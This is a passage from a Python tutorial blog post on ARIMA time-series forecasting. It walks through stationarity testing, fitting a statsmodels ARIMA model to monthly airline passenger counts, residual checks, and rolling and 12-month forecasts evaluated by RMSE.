&lt;li&gt;Taking a single difference results in a test statistic (-2.83) that is
just above the 5% cutoff (-2.88), so non-stationarity is not quite ruled out at the 5% level:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;statsmodels.tsa.statespace.tools&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; diff
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;adfuller(diff(y))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## (-2.829266824169999, 0.05421329028382552, 12, 130, {'1%': -3.4816817173418295, '5%': -2.8840418343195267, '10%': -2.578770059171598}, 988.5069317854084)
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;Taking a second difference results in a test statistic that is much
lower than even the 1% cutoff:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;statsmodels.tsa.statespace.tools&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; diff
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;adfuller(diff(y, k_diff&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## (-16.38423154246854, 2.7328918500140445e-29, 11, 130, {'1%': -3.4816817173418295, '5%': -2.8840418343195267, '10%': -2.578770059171598}, 988.6020417275605)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We see that a second order difference (&lt;em&gt;d&lt;/em&gt; = 2) produces a stationary
trend according to the ADF test. It is important to avoid excessively
high choices of &lt;em&gt;d&lt;/em&gt; since this can introduce artefacts in the final
model. So in practice it would be worth experimenting with both &lt;em&gt;d&lt;/em&gt; = 1
and &lt;em&gt;d&lt;/em&gt; = 2.&lt;/p&gt;
&lt;p&gt;What about the seasonal trend in the data? This suggests that we should
really be using the SARIMA framework (where the S stands for
“seasonal”). That would add a second set of seasonal parameters on top of (&lt;em&gt;p&lt;/em&gt;, &lt;em&gt;d&lt;/em&gt;, &lt;em&gt;q&lt;/em&gt;), so let’s
proceed with our simplified model and see how we get on.&lt;/p&gt;
&lt;h3 id="model-fitting"&gt;Model fitting&lt;/h3&gt;
&lt;p&gt;Having analysed the time series we have arrived at a reasonable choice
of our parameters: (&lt;em&gt;p&lt;/em&gt;, &lt;em&gt;d&lt;/em&gt;, &lt;em&gt;q&lt;/em&gt;) = (2, 2, 10). As stated above, in
practice we should really test a range of values but for now we will not
worry.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;statsmodels&lt;/code&gt; library provides an &lt;code&gt;ARIMA&lt;/code&gt; object for model fitting
and forecasting. Let’s call it with our parameter choices:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;statsmodels.tsa.arima.model&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; ARIMA
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ARIMA(y, order&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model_fit &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; model&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;fit()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can inspect the model using:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model_fit&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;summary()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## &amp;lt;class 'statsmodels.iolib.summary.Summary'&amp;gt;
## &amp;quot;&amp;quot;&amp;quot;
## SARIMAX Results
## ==============================================================================
## Dep. Variable: passengers No. Observations: 144
## Model: ARIMA(2, 2, 10) Log Likelihood -673.434
## Date: Wed, 27 Aug 2025 AIC 1372.867
## Time: 14:21:20 BIC 1411.293
## Sample: 0 HQIC 1388.482
## - 144
## Covariance Type: opg
## ==============================================================================
## coef std err z P&amp;gt;|z| [0.025 0.975]
## ------------------------------------------------------------------------------
## ar.L1 0.0376 0.027 1.386 0.166 -0.016 0.091
## ar.L2 -0.9770 0.026 -37.090 0.000 -1.029 -0.925
## ma.L1 -0.4439 153.608 -0.003 0.998 -301.510 300.622
## ma.L2 0.9971 142.058 0.007 0.994 -277.432 279.426
## ma.L3 -0.4440 90.869 -0.005 0.996 -178.543 177.655
## ma.L4 0.2001 163.089 0.001 0.999 -319.449 319.849
## ma.L5 -0.2122 163.925 -0.001 0.999 -321.499 321.075
## ma.L6 0.2396 165.114 0.001 0.999 -323.377 323.857
## ma.L7 -0.0025 79.453 -3.19e-05 1.000 -155.728 155.723
## ma.L8 -0.6393 156.926 -0.004 0.997 -308.208 306.930
## ma.L9 0.1965 136.829 0.001 0.999 -267.984 268.377
## ma.L10 -0.8908 0.125 -7.104 0.000 -1.137 -0.645
## sigma2 660.0238 1.030 640.771 0.000 658.005 662.043
## ===================================================================================
## Ljung-Box (L1) (Q): 0.42 Jarque-Bera (JB): 10.61
## Prob(Q): 0.52 Prob(JB): 0.00
## Heteroskedasticity (H): 6.53 Skew: 0.08
## Prob(H) (two-sided): 0.00 Kurtosis: 4.33
## ===================================================================================
##
## Warnings:
## [1] Covariance matrix calculated using the outer product of gradients (complex-step).
## [2] Covariance matrix is singular or near-singular, with condition number 1.78e+22. Standard errors may be unstable.
## &amp;quot;&amp;quot;&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The summary of the fit provides the log likelihood, AIC and BIC metrics.
If you’re testing different choices of the (&lt;em&gt;p&lt;/em&gt;, &lt;em&gt;d&lt;/em&gt;, &lt;em&gt;q&lt;/em&gt;) parameters
it’s worth comparing the AIC and BIC metrics (lower values suggest a
better fit).&lt;/p&gt;
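&lt;p&gt;As a rough check on where these numbers come from, the AIC and BIC can be recomputed from the log likelihood using their textbook definitions. The sketch below relies on two assumptions that are not stated in the summary itself: that 13 parameters were estimated (2 AR, 10 MA and &lt;code&gt;sigma2&lt;/code&gt;) and that 142 observations remain after differencing twice. The helper name &lt;code&gt;information_criteria()&lt;/code&gt; is hypothetical:&lt;/p&gt;

```python
import math


def information_criteria(log_likelihood, n_params, n_obs):
    """Return (AIC, BIC) computed from a maximised log likelihood."""
    aic = 2 * n_params - 2 * log_likelihood
    bic = n_params * math.log(n_obs) - 2 * log_likelihood
    return aic, bic


# Values read from the summary above. Assumptions: 13 estimated parameters
# (2 AR + 10 MA + sigma2) and 142 observations left after differencing twice.
aic, bic = information_criteria(log_likelihood=-673.434, n_params=13, n_obs=142)
print(round(aic, 2), round(bic, 2))
```

&lt;p&gt;Under these assumptions the results agree with the reported AIC and BIC to within rounding. Both metrics penalise extra parameters, with the BIC penalty growing as the number of observations increases.&lt;/p&gt;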
&lt;p&gt;The model summary also includes a couple of warnings, in this case
concerning the covariance matrix. We will not worry about these messages
for now; instead we will inspect the model residuals and forecasting ability as a way of
assessing the quality of the fit.&lt;/p&gt;
&lt;p&gt;Using &lt;code&gt;pandas&lt;/code&gt; we can inspect the residuals:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;residuals &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame(model_fit&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;resid)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;residuals&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;describe()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## 0
## count 144.000000
## mean 0.489740
## std 28.441220
## min -91.170547
## 25% -14.729881
## 50% -0.702994
## 75% 16.190037
## max 112.000000
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The residuals are centred close to zero, with a mean of about 0.5 and a median of about -0.7.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;residuals&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;plot(kind&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;kde&amp;#34;&lt;/span&gt;, legend&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;False&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;xlabel(&lt;span style="color:#a5d6ff"&gt;&amp;#34;residuals&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ylabel(&lt;span style="color:#a5d6ff"&gt;&amp;#34;density&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/time-series-forecasting-python-arima/plots/kde-9.png" alt="Kernel density estimation plot showing how the ARIMA model residuals are distributed. We observe a symmetrical distribution that is centred close to value 0." /&gt;
&lt;p&gt;We can also plot the residuals over time to inspect the outliers.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;residuals&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;plot(legend&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;False&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;hlines(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;144&lt;/span&gt;, color&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;black&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;xlabel(&lt;span style="color:#a5d6ff"&gt;&amp;#34;month&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ylabel(&lt;span style="color:#a5d6ff"&gt;&amp;#34;residuals&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/time-series-forecasting-python-arima/plots/residuals-11.png" alt="Plot showing the ARIMA model residuals plotted against time. We observe a fluctuating trend which appears random, that is centred on the horizontal zero line. Most of the residuals are within -50 and +50." /&gt;
&lt;p&gt;For an initial model this appears reasonable.&lt;/p&gt;
&lt;h3 id="forecasting"&gt;Forecasting&lt;/h3&gt;
&lt;p&gt;Now that we have a model we can try forecasting future time points.
There are a number of possible use cases:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;We may only be interested in forecasting the next month. We can
simulate this with our data set by using a “rolling forecast” where
the model is retrained on all of the data up to the current time
point before predicting the next time point.&lt;/li&gt;
&lt;li&gt;The model could also be used for quarterly or yearly forecasting,
where we predict multiple future time points at once.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Let’s go with approach 1 first. We will start by splitting the time
series into an initial training set and a hold-out test set:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;y_values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; list(y&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;values)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;train, test &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; y_values[:&lt;span style="color:#a5d6ff"&gt;96&lt;/span&gt;], y_values[&lt;span style="color:#a5d6ff"&gt;96&lt;/span&gt;:&lt;span style="color:#a5d6ff"&gt;132&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Since time series models are typically used to forecast into the future,
a common practice for testing is to remove the end of the time series
from the training set and hold it out for testing. Here we have set
aside 3 years of data for testing.&lt;/p&gt;
&lt;p&gt;We will now simulate 3 years’ worth of monthly forecasting, where every
month we retrain the model with the latest data and produce a forecast
for the next month. Forecasts are produced using the &lt;code&gt;.forecast()&lt;/code&gt;
method, which predicts the next time point by default.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;predictions &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; []
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;current_params &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;None&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; i &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; range(len(test)):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; model &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ARIMA(train, order&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; model_fit &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; model&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;fit(start_params&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;current_params)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; current_params &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; model_fit&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;params &lt;span style="color:#8b949e;font-style:italic"&gt;# update the parameters&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; output &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; model_fit&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;forecast()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; predictions&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;append(output[&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;]) &lt;span style="color:#8b949e;font-style:italic"&gt;# store the prediction&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; train&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;append(test[i]) &lt;span style="color:#8b949e;font-style:italic"&gt;# update the training set&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Depending on the model complexity this can take a few minutes to run
(the above code chunk took 1-2 minutes). To save some optimisation time,
at every time step we have used the best-fit parameters produced for the
previous model as the starting parameters for the next model (using the
&lt;code&gt;start_params&lt;/code&gt; argument).&lt;/p&gt;
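&lt;p&gt;The rolling pattern itself does not depend on ARIMA. As a minimal sketch, the loop can be wrapped in a function that accepts any one-step forecaster. The names &lt;code&gt;rolling_forecast&lt;/code&gt; and &lt;code&gt;last_value_forecaster&lt;/code&gt; are hypothetical, and the forecaster is a deliberately naive stand-in rather than a fitted model. Unlike the loop above, this version works on a copy, so the caller’s training list is left unchanged.&lt;/p&gt;

```python
def rolling_forecast(train, test, fit_and_forecast):
    """Walk-forward validation: forecast one step, then reveal the true value."""
    history = list(train)  # copy, so the caller's list is not mutated
    predictions = []
    for observed in test:
        # "Refit" on everything seen so far and predict the next point
        predictions.append(fit_and_forecast(history))
        # The true observation becomes part of the history for the next step
        history.append(observed)
    return predictions


def last_value_forecaster(history):
    """Hypothetical stand-in model: predict that the next value equals the latest one."""
    return history[-1]


train = [10, 12, 13]
test = [15, 14, 18]
predictions = rolling_forecast(train, test, last_value_forecaster)
print(predictions)  # [13, 15, 14]
print(train)        # [10, 12, 13]
```

&lt;p&gt;A naive forecaster like this one also makes a useful baseline: a fitted model should at least beat it on the same test set.&lt;/p&gt;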
&lt;p&gt;We now have a list of predictions to compare against our test
observations. Let’s plot these together and compute the
root-mean-squared error (RMSE):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;sklearn.metrics&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; mean_squared_error
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;numpy&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;np&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rmse &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;sqrt(mean_squared_error(test, predictions))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;print(&lt;span style="color:#79c0ff"&gt;f&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;RMSE: &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;{&lt;/span&gt;rmse&lt;span style="color:#a5d6ff"&gt;}&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## RMSE: 30.875187739583858
&lt;/code&gt;&lt;/pre&gt;
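&lt;p&gt;For reference, RMSE is the square root of the mean of the squared differences between observations and predictions, so it is expressed in the same units as the data (here, passengers). The sketch below spells this out with the standard library only; the function name and the three data points are made up for illustration.&lt;/p&gt;

```python
import math


def root_mean_squared_error(observed, predicted):
    """Square root of the mean squared difference between two equal-length sequences."""
    if len(observed) != len(predicted):
        raise ValueError("observed and predicted must have the same length")
    squared_errors = [(o - p) ** 2 for o, p in zip(observed, predicted)]
    return math.sqrt(sum(squared_errors) / len(squared_errors))


# Made-up values, not taken from the airline data
observed = [100, 110, 120]
predicted = [98, 113, 120]

# Squared errors are 4, 9 and 0, so the result is sqrt(13 / 3)
print(root_mean_squared_error(observed, predicted))
```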
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;plot(test, color&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;blue&amp;#34;&lt;/span&gt;, label&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;observed&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;plot(predictions, color&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;red&amp;#34;&lt;/span&gt;, label&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;ARIMA&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;xlabel(&lt;span style="color:#a5d6ff"&gt;&amp;#34;month&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ylabel(&lt;span style="color:#a5d6ff"&gt;&amp;#34;passengers&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;legend()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/time-series-forecasting-python-arima/plots/rolling-13.png" alt="Plot showing the passengers time series for three years of monthly data. The observed time series is plotted in blue and the ARIMA rolling predictions are plotted in red. The predictions appear to align closely with the observations and capture the seasonal pattern." /&gt;
&lt;p&gt;The agreement looks reasonable.&lt;/p&gt;
&lt;p&gt;Alternatively, we may want to predict all 12 months in the next year.
Let’s use the final 12 months of data (which were left out of the above
analysis):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;test &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; y_values[&lt;span style="color:#a5d6ff"&gt;132&lt;/span&gt;:]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We now retrain the model on the first 11 years’ worth of data and this
time use it to forecast the next 12 months:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ARIMA(train, order&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model_fit &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; model&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;fit()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;output &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; model_fit&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;forecast(steps&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;12&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# predict 12 time points&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;predictions &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; output[:&lt;span style="color:#a5d6ff"&gt;12&lt;/span&gt;] &lt;span style="color:#8b949e;font-style:italic"&gt;# store the predictions&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Let’s compare the predictions with the test observations:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rmse &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;sqrt(mean_squared_error(test, predictions))
